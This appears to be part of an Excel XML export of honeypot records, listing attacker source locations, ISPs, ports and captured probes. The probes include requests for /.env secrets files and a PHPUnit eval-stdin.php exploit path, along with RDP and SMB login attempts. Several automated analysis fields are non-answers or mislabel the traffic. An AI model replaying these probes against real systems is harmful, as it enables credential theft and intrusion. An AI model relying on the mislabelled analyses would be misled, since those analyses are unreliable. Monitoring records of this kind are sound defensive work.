PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_SNMP:{'community': 'UnKnown', 'oids': 'UnKnown', 'version': 'UnKnown'}}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'JGKO0'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=root'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (guest,)}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'HOPB0'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 38.54.116.162:9100_x000d__x000a_User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.117 Safari/537.36 _x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': '@PJL INFO STATUS_x000d__x000a_@PJL INFO ID_x000d__x000a_@PJL INFO PRODINFO_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'SSH-2.0-Go_x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1 _x000d__x000a__x000d__x000a_'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d9c:8038"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No information is available to analyze. &amp;&amp; Unsuccessful attempt to access PostgreSQL database service, likely due to incorrect login credentials or an exploit scan. The lack of 'Data' indicates no successful interaction with the database service. This activity suggests reconnaissance or a brute-force attack. &amp;&amp; There is insufficient log data provided to analyze any possible malicious activity. &amp;&amp; No available log data provided."/>
    <s v="I need log data to analyze the attacks. Please provide the log data, and I'll identify the types of attacks. _x000a__x000a_(If you're providing it now, please go ahead, and I'll proceed with analysis.)"/>
  </r>
  <r>
    <x v="109"/>
    <x v="109"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:11:27"/>
    <d v="2025-01-30T01:37:18"/>
    <d v="2025-04-30T17:11:27"/>
    <n v="1602"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Session Manipulation&amp;&amp;Credential Stuffing&amp;&amp;Email Spoofing"/>
    <s v="medium"/>
    <s v="SMA-LAB_SMTP_H8&amp;&amp;SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H2&amp;&amp;SMA-LAB_HTTPS_H7&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_HTTP_H11"/>
    <s v="25&amp;&amp;443&amp;&amp;80&amp;&amp;NA&amp;&amp;47264"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="LT"/>
    <s v="Lithuania"/>
    <s v="VL"/>
    <s v="Vilnius"/>
    <s v="Vilnius City Municipality"/>
    <s v="Vilnius"/>
    <s v="593116"/>
    <s v="01001"/>
    <s v="54.6872"/>
    <s v="25.2797"/>
    <s v="215240"/>
    <s v="Silent Connection Ltd."/>
    <s v="Silent Connection Ltd."/>
    <s v="business"/>
    <s v="Silent Connection Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;GET&amp;&amp;POST&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '19', 'Host': '194.233.76.135', 'User-Agent': 'python-requests/2.25.1', 'method': 'GET', 'uri': '/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '193.57.136.113', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '149.102.153.168', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '185.74.222.213', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '194.233.76.135', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '144.126.148.5', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.26.156.60', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Content-Length': '20', 'Content-Type': 'application/x-www-form-urlencoded', 'Host': '154.93.37.45', 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36', 'method': 'POST', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b041:8612"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;medium"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="The attackers are attempting to gather information about the system, such as its IP address, user names, and potential vulnerabilities. They are also trying to gain access to various services, including databases, file transfer protocols, and email servers."/>
    <s v="SMB Relay Attack"/>
  </r>
  <r>
    <x v="110"/>
    <x v="110"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:11:17"/>
    <d v="2023-12-03T09:43:00"/>
    <d v="2025-04-30T17:11:17"/>
    <n v="25"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="62284&amp;&amp;23&amp;&amp;49971&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Jeongja-dong)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3638"/>
    <s v="127.116"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="KORNET"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7986:91fc"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No available log data provided for analysis."/>
    <s v="I'll need some log data to analyze, but I can give you some common types of attacks that may be seen in a honeypot's logs:_x000a__x000a_*   Brute Force_x000a_*   SQLi_x000a_*   Phishing_x000a_*   RootKit_x000a_*   DoS_x000a_*   DDoS"/>
  </r>
  <r>
    <x v="111"/>
    <x v="111"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:11:09"/>
    <d v="2024-04-14T14:51:00"/>
    <d v="2025-04-30T17:11:09"/>
    <n v="30"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_MT-CPA_H37&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;31643&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="NA"/>
    <s v="37.3589"/>
    <s v="127.115"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Korea Telecom"/>
    <s v="None"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b763:c65"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="No Telnet activity detected, which is unusual since Telnet services are typically exposed to the internet for remote access._x000a_This could be an indication of an attacker attempting to exploit known vulnerabilities in Telnet servers._x000a_The lack of activity may also suggest the service is not reachable or configured incorrectly."/>
    <s v="Brute Scan"/>
  </r>
  <r>
    <x v="112"/>
    <x v="112"/>
    <s v="NA&amp;&amp;uplifting.monitoring.internet-measurement.com"/>
    <x v="0"/>
    <d v="2025-04-30T17:11:01"/>
    <d v="2024-12-12T00:21:09"/>
    <d v="2025-04-30T17:11:01"/>
    <n v="291"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Encryption Misuse&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_ORACLE_H2&amp;&amp;SMA-LAB_REDIS_H39&amp;&amp;SMA-LAB_POSTGRES_H40&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_REDIS_H31&amp;&amp;SMA-LAB_SMB_H23&amp;&amp;SMA-LAB_POSTGRES_H32&amp;&amp;SMA-LAB_POSTGRES_H28&amp;&amp;SMA-LAB_PJL_H23&amp;&amp;SMA-LAB_PJL_H4&amp;&amp;SMA-LAB_ORACLE_H41&amp;&amp;SMA-LAB_PJL_HC1&amp;&amp;SMA-LAB_HTTPS_H15&amp;&amp;SMA-LAB_REDIS_HC1&amp;&amp;SMA-LAB_POSTGRES_H12&amp;&amp;SMA-LAB_REDIS_H38&amp;&amp;SMA-LAB_REDIS_H37&amp;&amp;SMA-LAB_SOCKS5_H31&amp;&amp;SMA-LAB_SIP_H17&amp;&amp;SMA-LAB_PJL_H11&amp;&amp;SMA-LAB_REDIS_H26&amp;&amp;SMA-LAB_SIP_H35&amp;&amp;SMA-LAB_REDIS_H45&amp;&amp;SMA-LAB_MYSQL_H40&amp;&amp;SMA-LAB_POSTGRES_H8&amp;&amp;SMA-LAB_REDIS_H34&amp;&amp;SMA-LAB_IMAP_H26&amp;&amp;SMA-LAB_SOCKS5_H11&amp;&amp;SMA-LAB_HTTPS_H18&amp;&amp;SMA-LAB_REDIS_H19&amp;&amp;SMA-LAB_HTTPS_H41&amp;&amp;SMA-LAB_REDIS_H5&amp;&amp;SMA-LAB_REDIS_H10"/>
    <s v="1521&amp;&amp;6379&amp;&amp;5432&amp;&amp;1080&amp;&amp;445&amp;&amp;9100&amp;&amp;443&amp;&amp;NA&amp;&amp;3306&amp;&amp;143&amp;&amp;6667&amp;&amp;110&amp;&amp;21&amp;&amp;25&amp;&amp;80&amp;&amp;45897&amp;&amp;1433&amp;&amp;23&amp;&amp;5900&amp;&amp;42139&amp;&amp;49321&amp;&amp;43963&amp;&amp;36325&amp;&amp;389"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="ENG"/>
    <s v="England"/>
    <s v="Leeds"/>
    <s v="Leeds"/>
    <s v="2644688"/>
    <s v="LS1"/>
    <s v="53.8008"/>
    <s v="-1.54908"/>
    <s v="211298"/>
    <s v="Driftnet Ltd"/>
    <s v="Driftnet Ltd"/>
    <s v="hosting"/>
    <s v="Constantine Cybersecurity LTD"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;command&amp;&amp;GET&amp;&amp;NA&amp;&amp;login&amp;&amp;query&amp;&amp;request"/>
    <s v="NA&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'HELP'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'SYST'}}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'FEAT'}}&amp;&amp;{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'STARTTLS', 'data': 'None'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'CAPA'}}&amp;&amp;{Data_POP3:{'args': '', 'cmd': 'QUIT'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '109.123.229.33', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.227,36253)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (185.247.137.227,45945)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_FTP:{'args': '()', 'cmd': 'QUIT'}}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_PJL:{'command': '@PJL INFO ID_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_SIP:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'rblofivn', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.227;tag=rblofivn', 'max-forwards': '0', 'to': 'sip:38.54.117.64', 'via': 'SIP/2.0/UDP 185.247.137.227:5060;branch=z9hG4bKrblofivn;received=185.247.137.227;rport=56257'}}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 95.164.21.98:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_PJL:{'command': 'GET / HTTP/1.1_x000d__x000a_Host: 194.146.12.172:9100_x000d__x000a_User-Agent: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)_x000d__x000a_Connection: close_x000d__x000a_Accept: */*_x000d__x000a_Accept-Encoding: gzip_x000d__x000a__x000d__x000a_'}}&amp;&amp;{Data_IRC:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_SIP:{'accept': 'application/sdp', 'call-id': 'vmifplis', 'content-length': '0', 'cseq': '1 OPTIONS', 'from': 'sip:185.247.137.227;tag=vmifplis', 'max-forwards': '0', 'to': 'sip:38.60.224.106', 'via': 'SIP/2.0/UDP 185.247.137.227:5060;branch=z9hG4bKvmifplis;received=185.247.137.227;rport=35800'}}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Connection': 'close', 'Host': '95.164.21.98', 'User-Agent': 'Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b9f7:89e3"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low&amp;&amp;Medium"/>
    <s v="No log data available for analysis. &amp;&amp; No available log data provided for analysis. &amp;&amp; The user is querying for FTP server help, which could be a reconnaissance attempt to gather information about the system's configuration and potential vulnerabilities. This action alone does not indicate malicious intent but may be part of a larger probing activity. Further analysis of subsequent actions would be necessary to assess actual threat level."/>
    <s v="File Scan"/>
  </r>
  <r>
    <x v="113"/>
    <x v="113"/>
    <s v="NA&amp;&amp;host-92-17-191-106.as13285.net"/>
    <x v="0"/>
    <d v="2025-04-30T17:10:51"/>
    <d v="2025-04-01T13:37:31"/>
    <d v="2025-04-30T17:10:51"/>
    <n v="18"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="GB"/>
    <s v="United Kingdom"/>
    <s v="SCT"/>
    <s v="Scotland"/>
    <s v="Fife"/>
    <s v="Springfield"/>
    <s v="2637194"/>
    <s v="NA"/>
    <s v="56.2951"/>
    <s v="-3.0612"/>
    <s v="13285"/>
    <s v="TalkTalk Communications Limited"/>
    <s v="TalkTalk"/>
    <s v="residential"/>
    <s v="Carphone Warehouse Broadband Services"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:5c11:bf6a"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="114"/>
    <x v="114"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-30T17:10:27"/>
    <d v="2024-02-27T21:26:55"/>
    <d v="2025-04-30T17:10:27"/>
    <n v="119"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
